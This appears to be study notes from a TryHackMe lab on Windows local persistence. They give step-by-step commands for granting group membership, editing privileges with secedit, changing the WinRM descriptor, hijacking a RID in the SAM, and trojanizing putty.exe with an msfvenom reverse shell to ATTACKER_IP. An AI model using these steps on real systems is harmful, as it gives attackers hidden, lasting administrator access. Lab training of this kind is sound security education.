Assign Group Memberships
The direct way to make an unprivileged user gain administrative privileges is to make it part of the Administrators group. We can easily achieve this with the following command:
net localgroup administrators jack /addCan also use the Backup Operators group. Users in this group won't have administrative privileges but will be allowed to read/write any file or registry key on the system, ignoring any configured DACL.
net localgroup "Backup Operators" jack /addSince this is an unprivileged account, it cannot RDP or WinRM back to the machine unless we add it to the Remote Desktop Users (RDP) or Remote Management Users (WinRM) groups. We'll use WinRM.
net localgroup "Remote Management Users" jack /add
net localgroup "Remote Desktop Users" jack /addCheck the groups and make sure they are not disabled
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Group used for deny onlyThis is due to User Account Control (UAC). One of the features implemented by UAC,
LocalAccountTokenFilterPolicy, strips any local account of its administrative privileges when logging in remotely. While you can elevate your privileges through UAC from a graphical user session, if you are using WinRM, you are confined to a limited access token with no administrative privileges.Disable
LocalAccountTokenFilterPolicyby changing the following registry key to 1:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1Special Privileges and Security Descriptors
A similar result to adding a user to the Backup Operators group can be achieved without modifying any group membership.
Special groups are only special because the operating system assigns them specific privileges by default. Privileges are simply the capacity to do a task on the system itself.
Complete list of all privileges:
https://docs.microsoft.com/en-us/windows/win32/secauthz/privilege-constants
In the case of the Backup Operators group, it has the following two privileges assigned by default:
SeBackupPrivilege: The user can read any file in the system, ignoring any DACL in place.SeRestorePrivilege: The user can write any file in the system, ignoring any DACL in place.We can assign such privileges to any user, independent of their group memberships. To do so, we can use the
seceditcommand. First, we will export the current configuration to a temporary file:
secedit /export /cfg config.infWe open the file and add our user to the lines in the configuration regarding the SeBackupPrivilege and SeRestorePrivilege:
We finally convert the
.inffile into a.sdbfile which is then used to load the configuration back into the system:
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.infYou should now have a user with equivalent privileges to any
Backup Operator. The user still can't log into the system via WinRM, so let's do something about it.Instead of adding the user to the
Remote Management Usersgroup, we'll change the security descriptor associated with the WinRM service to allowjackto connect.Think of a security descriptor as an ACL but applied to other system facilities.
To open the configuration window for WinRM's security descriptor, you can use the following command in Powershell (you'll need to use the GUI session for this):
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUIThis will open a window where you can add
jackand assign it full privileges to connect to WinRM:
Notice that for this user to work with the given privileges fully, you'd have to change the
LocalAccountTokenFilterPolicyregistry keyIf you check your user's group memberships, it will look like a regular user. Nothing suspicious at all!
net user jack
User name jack
Local Group Memberships *Users
Global Group memberships *NoneRID Hijacking
When a user is created, an identifier called Relative ID (RID) is assigned to them.
The
RIDis simply a numeric identifier representing the user across the system. When a user logs on, theLSASSprocess gets itsRIDfrom theSAMregistry hive and creates an access token associated with thatRID.If we can tamper with the registry value, we can make windows assign an Administrator access token to an unprivileged user by associating the same RID to both accounts.
In any Windows system, the default Administrator account is assigned the
RID = 500, and regular users usually haveRID >= 1000.
wmic useraccount get name,sid
Name SID
Administrator S-1-5-21-1966530601-3185510712-10604624-500
DefaultAccount S-1-5-21-1966530601-3185510712-10604624-503
--snip--Now we only have to assign the
RID=500tojack. To do so, we need to access theSAMusingRegedit. TheSAMis restricted to theSYSTEMaccount only, so even theAdministratorwon't be able to edit it. To runRegeditasSYSTEM, we will usepsexec.PsExec64.exe -i -s regeditFrom Regedit, we will go to:HKLM\SAM\SAM\Domains\Account\Users\We need to search for a key with its
RIDin hex(1010 = 0x3F2). Under the corresponding key, there will be a value calledF, which holds the user's effectiveRIDat position0x30:
Notice the RID is stored using little-endian notation, so its bytes appear reversed.
We will now replace those two bytes with the RID of Administrator in hex (500 = 0x01F4), switching around the bytes (F401):
The next time
jacklogs in,LSASSwill associate it with the sameRIDas Administrator and grant them the same privileges.
Executable Files
If you find any executable laying around the desktop, the chances are high that the user might use it frequently.
Suppose we find a shortcut to
PuTTYlying around. If we checked the shortcut's properties, we could see that it (usually) points toC:\Program Files\PuTTY\putty.exe. From that point, we could download the executable to our attacker's machine and modify it to run any payload we wanted.
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exeCredit:
All credit to the content of this page goes to the original author
https://tryhackme.com/room/windowslocalpersistence
https://tryhackme.com/p/munra
https://tryhackme.com/p/tryhackme
Last updated